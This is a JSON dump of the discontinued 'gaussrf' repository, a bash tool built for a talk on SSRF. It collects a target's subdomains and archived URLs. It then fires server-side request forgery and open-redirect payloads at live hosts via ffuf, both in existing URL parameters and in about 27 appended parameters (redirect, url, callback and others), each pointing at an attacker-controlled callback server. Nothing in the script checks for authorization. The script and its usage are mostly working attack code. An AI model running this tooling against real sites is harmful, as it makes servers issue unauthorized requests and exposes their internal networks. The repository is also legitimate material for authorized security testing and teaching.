[
  {
    "path": "README.md",
    "content": "# gaussrf\n**This project is now discontinued and is no longer maintained.**\n```\n\n\n____________________  __   ________________________________\n__  ____/__    |_  / / /   __  ___/_  ___/__  __ \\__  ____/\n_  / __ __  /| |  / / /    _____ \\_____ \\__  /_/ /_  /_    \n/ /_/ / _  ___ / /_/ /     ____/ /____/ /_  _, _/_  __/    \n\\____/  /_/  |_\\____/      /____/ /____/ /_/ |_| /_/       \n                                                           \n\n\n```\nFetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl, and filter for URLs with open redirection or SSRF parameters. This tool was built for the Null Ahmedabad session [Deep Dive into SSRF](https://null.co.in/event_sessions/3086-deep-dive-into-ssrf); the slides are available at that link.\n\n## Prerequisites\n\n* [GetAllUrls](https://github.com/lc/gau) - For fetching URLs\n* [Assetfinder](https://github.com/tomnomnom/assetfinder) - For subdomain enumeration\n* [Drishti](https://github.com/devanshbatham/Drishti) - For checking whether a URL is live.\n\nYou can use `install.sh` to install the required tools. These tools are written in Go, so Go must be installed on your system with its path set correctly. `install.sh` also installs qsreplace and ffuf, which `ssrf.sh` uses.\n```bash\n$ sudo chmod +x install.sh\n$ ./install.sh\n```\n### Installation\n\n```bash\n$ git clone https://github.com/KathanP19/gaussrf.git\n$ cd gaussrf/\n$ sudo chmod +x ssrf.sh\n``` \n### Usage\nDon't forget to put your blind SSRF testing link or Burp Collaborator link in `burp.txt`,\nor you can use this site, [SSRFTest](https://ssrftest.com/), if you don't have Burp Pro.\n\n```\n          ____________________  __   ________________________________\n          __  ____/__    |_  / / /   __  ___/_  ___/__  __ \\__  ____/\n          _  / __ __  /| |  / / /    _____ \\_____ \\__  /_/ /_  /_\n          / /_/ / _  ___ / /_/ /     ____/ /____/ /_  _, _/_  __/\n          \\____/  /_/  |_\\____/      /____/ /____/ /_/ |_| /_/\n\n\n\n\nUsage: For Using directly where subdomains will be 
found using Assetfinder\n      ./ssrf.sh -d domain.com\n      ./ssrf.sh -d domain.com -o output_directory\n      ./ssrf.sh -d domain.com -ap\n      ./ssrf.sh -d domain.com -o output_directory -ap\n\nUsage: For Using list of Subdomains\n      ./ssrf.sh -l subdomains.txt\n      ./ssrf.sh -l subdomains.txt -o output_directory\n      ./ssrf.sh -l subdomains.txt -ap\n      ./ssrf.sh -l subdomains.txt -o output_directory -ap\n```\n```\nOptions are as follows \n  -d  for direct letting assetfinder handle subdomain part\n  -l  for using list of subdomains\n  -o  for declaring output directory\n  -ap for using parameter appending feature\n```\n## Credits:\nThanks @tomnomnom for [Assetfinder](https://github.com/tomnomnom)!\n\nThanks @devanshbatham for [Drishti](https://github.com/devanshbatham/Drishti)!\n\nThanks @lc for [GAU](https://github.com/lc/gau)!\n\nThanks @hussein98d for the parameter appending feature.\n\n### TODO list\n\n~~Integrate [ffuf](https://github.com/ffuf/ffuf) to fuzz params with the Burp Collaborator URL.~~\n\n~~Add an option for users to supply their own subdomain list.~~\n\n## Contributors\n[@iNoSec2](https://github.com/iNoSec2) for adding the output option.\n"
  },
  {
    "path": "burp.txt",
    "content": "http://[yourburpcollaburl]\n"
  },
  {
    "path": "install.sh",
    "content": "#!/bin/bash\n\necho \"============================Installing Tools For GAUSSRF==========================\"\necho \" \"\n\n##Install Assetfinder\necho -e \"\\nINSTALLING \\e[31m[assetfinder]\\e[0m\"\ngo get -u github.com/tomnomnom/assetfinder\necho -e \"\\nINSTALLING ASSETFINDER \\e[32mFINISH\\e[0m\"\n\n##Install GAU\necho -e \"\\nINSTALLING \\e[31m[GAU]\\e[0m\"\ngo get -u github.com/lc/gau\necho -e \"\\nINSTALLING GAU \\e[32mFINISH\\e[0m\"\n\n##Installing Drishti\necho -e \"\\nINSTALLING \\e[31m[Drishti]\\e[0m\"\ngit clone https://github.com/devanshbatham/Drishti\ncd Drishti\npip3 install -r requirements.txt\nrm raw_urls.txt\ncd ..\necho -e \"\\nINSTALLING Drishti \\e[32mFINISH\\e[0m\"\n\n##Install qsreplace\necho -e \"\\nINSTALLING \\e[31m[QSreplace]\\e[0m\"\ngo get -u github.com/tomnomnom/qsreplace\necho -e \"\\nINSTALLING Qsreplace \\e[32mFINISH\\e[0m\"\n\n##Install ffuf\necho -e \"\\nINSTALLING \\e[31m[FFUF]\\e[0m\"\ngo get github.com/ffuf/ffuf\necho -e \"\\nINSTALLING FFUF \\e[32mFINISH\\e[0m\"\n\necho \"=============================Done Installing Tools=================================\"\n"
  },
  {
    "path": "ssrf.sh",
    "content": "#!/bin/bash\n\nred=`tput setaf 1`\nreset=`tput sgr0`\n\nlogo(){\n echo \"${red}\n\n          ____________________  __   ________________________________\n          __  ____/__    |_  / / /   __  ___/_  ___/__  __ \\__  ____/\n          _  / __ __  /| |  / / /    _____ \\_____ \\__  /_/ /_  /_\n          / /_/ / _  ___ / /_/ /     ____/ /____/ /_  _, _/_  __/\n          \\____/  /_/  |_\\____/      /____/ /____/ /_/ |_| /_/\n\n\n\n${reset}\"\n}\n\nsubs(){\nlogo\n##Getting SubDomains\necho -e \"\\nRUNNING \\e[31m[assetfinder]\\e[0m\"\nassetfinder --subs-only $domain > $output_directory/$domain/$domain.assetfinder.txt\ncat $output_directory/$domain/$domain.assetfinder.txt | sort -u > $output_directory/$domain/subs.txt\necho \"FOUND SUBDOMAINS [$(cat $output_directory/$domain/subs.txt | wc -l)]\"\necho -e \"RUNNING ASSETFINDER \\e[32mFINISH\\e[0m\"\n}\n\nlist(){\nlogo\necho \"Its the list of subdomains\"\ncp $param $output_directory/$domain/subs.txt\n}\n\nrecon(){\n##Starting GETALLURLS\necho -e \"\\nRUNNING \\e[31m[GAU]\\e[0m\"\ncat  $output_directory/$domain/subs.txt | gau > $output_directory/$domain/$domain.urls.txt\necho -e \"RUNNING GAU \\e[32mFINISH\\e[0m\"\n\necho \"${red} ---------------COLLECTED URLS OF SUBDOMAINS--------------- ${reset}\"\n\n##Filter Urls to check with drishti\necho -e \"\\n\\e[31m[Filtering Urls with params]\\e[0m\"\ncat $output_directory/$domain/$domain.urls.txt | grep \"=http\" | tee $output_directory/$domain/$domain.urls_with_params.txt\necho -e \"Filtering Urls with params completed \\e[32mFINISH\\e[0m\"\n\n##Cleaning the list for urls\necho -e \"\\nChecking for Live Urls \\e[31m[LIST]\\e[0m\"\ncp $output_directory/$domain/$domain.urls_with_params.txt ./Drishti/\nmv ./Drishti/$domain.urls_with_params.txt ./Drishti/raw_urls.txt\ncd ./Drishti\npython3 drishti.py\ncd ..\ncp ./Drishti/Results-200.txt $output_directory/$domain/\nrm ./Drishti/raw_urls.txt\necho \"FOUND POSSIBLE SSRF URLS [$(cat 
$output_directory/$domain/Results-200.txt | wc -l)]\"\necho -e \"Checking for Live Urls \\e[32mFINISH\\e[0m\"\n\n##FUZZ\necho -e \"\\nHope You Have Added Burp Collab Url In burp.txt Fuzzing\\e[31m[LIST]\\e[0m\"\ncat $output_directory/$domain/Results-200.txt | qsreplace FUZZ > $output_directory/$domain/fuzzable.txt\nffuf -w \"$output_directory/$domain/fuzzable.txt:URL\" -w burp.txt -u URLFUZZ -v\necho \"${red} --------------DONE---------------- ${reset}\"\n}\nparam(){\necho -e \"\\n\\e[31m[Making List of Appened SSRF Params And Fire Them]\\e[0m\"\nser=`cat burp.txt`\ncat $output_directory/$domain/Results-200.txt | sort | uniq | grep \"?\" | qsreplace -a | qsreplace $ser > $output_directory/$domain/appended_params.txt\nsed -i \"s|$|\\&dest=$ser\\&redirect=$ser\\&uri=$ser\\&path=$ser\\&continue=$ser\\&url=$ser\\&window=$ser\\&next=$ser\\&data=$ser\\&reference=$ser\\&site=$ser\\&html=$ser\\&val=$ser\\&validate=$ser\\&domain=$ser\\&callback=$ser\\&return=$ser\\&page=$ser\\&feed=$ser\\&host=$ser&\\port=$ser\\&to=$ser\\&out=$ser\\&view=$ser\\&dir=$ser\\&show=$ser\\&navigation=$ser\\&open=$ser|g\" $output_directory/$domain/appended_params.txt\necho -e \"\\nTOTAL NUMBER OF URLS APPENED WITH PARAMS [$(cat $output_directory/$domain/appended_params.txt | wc -l)]\"\necho \"${red}-----------------------Check Your Server for Potential Callbacks------------------------- ${reset}\"\nffuf -w $output_directory/$domain/appended_params.txt -u FUZZ -t 50\necho \"${red} --------------DONE---------------- ${reset}\"\n}\n\nkillit(){\n        logo\n        echo \"Usage: For Using directly which will find domains using Assetfinder\"\n        echo \"      ./ssrf.sh -d domain.com\"\n        echo \"      ./ssrf.sh -d domain.com -o output_directory\"\n        echo \"      ./ssrf.sh -d domain.com -ap\"\n        echo \"      ./ssrf.sh -d domain.com -o output_directory -ap\"\n        echo \" \"\n        echo \"Usage: For Using list of Subdomains\"\n        echo \"      ./ssrf.sh -l 
subdomains.txt\"\n        echo \"      ./ssrf.sh -l subdomains.txt -o output_directory\"\n        echo \"      ./ssrf.sh -l subdomains.txt -ap\"\n        echo \"      ./ssrf.sh -l subdomains.txt -o output_directory -ap\"\n        exit 1\n}\n\nif [ -z \"$1\" ];then\n    killit\nelse\nwhile [ -n \"$1\" ]; do\n        case \"$1\" in\n        -d) domain=\"$2\"\n            if [[ $3 == '-o' && $5 == \"-ap\" ]];then\n            output_directory=\"$4/gaussrf/recon/\"\n            mkdir -p \"$output_directory\"/\"$domain\"\n            subs $domain\n            recon $domain\n            param $domain\n            elif [[ $3 == \"-o\" ]]\n            then\n            output_directory=\"$4/gaussrf/recon/\"\n            mkdir -p \"$output_directory\"/\"$domain\"\n            subs $domain\n            recon $domain\n            elif [[ $3 == \"-ap\" ]]\n            then\n            output_directory=\"recon\"\n            mkdir -p \"$output_directory\"/\"$domain\"\n            subs $domain\n            recon $domain\n            param $domain\n            else\n            output_directory=\"recon\"\n            mkdir -p \"$output_directory\"/\"$domain\"\n            subs $domain\n            recon $domain\n            fi\n            shift\n            break\n            ;;\n        -l) param=\"$2\"\n            echo -n \"What's is your target name : \"\n            read domain\n            if [[ $3 == '-o' && $5 == \"-ap\" ]];then\n            output_directory=\"$4/gaussrf/recon/\"\n            mkdir -p \"$output_directory\"/\"$domain\"\n            list\n            recon $domain\n            param $domain\n            elif [[ $3 == \"-o\" ]]\n            then\n            output_directory=\"$4/gaussrf/recon/\"\n            mkdir -p \"$output_directory\"/\"$domain\"\n            list\n            recon $domain\n            elif [[ $3 == \"-ap\" ]]\n            then\n            output_directory=\"recon\"\n            mkdir -p \"$output_directory\"/\"$domain\"\n           
 list\n            recon $domain\n            param $domain\n            else\n            output_directory=\"recon\"\n            mkdir -p \"$output_directory\"/\"$domain\"\n            list\n            recon $domain\n            fi\n            shift\n            break\n            ;;\n        *) echo \"Option $1 not recongnized\" ;;\n        esac\n        shift\ndone\nfi\n"
  }
]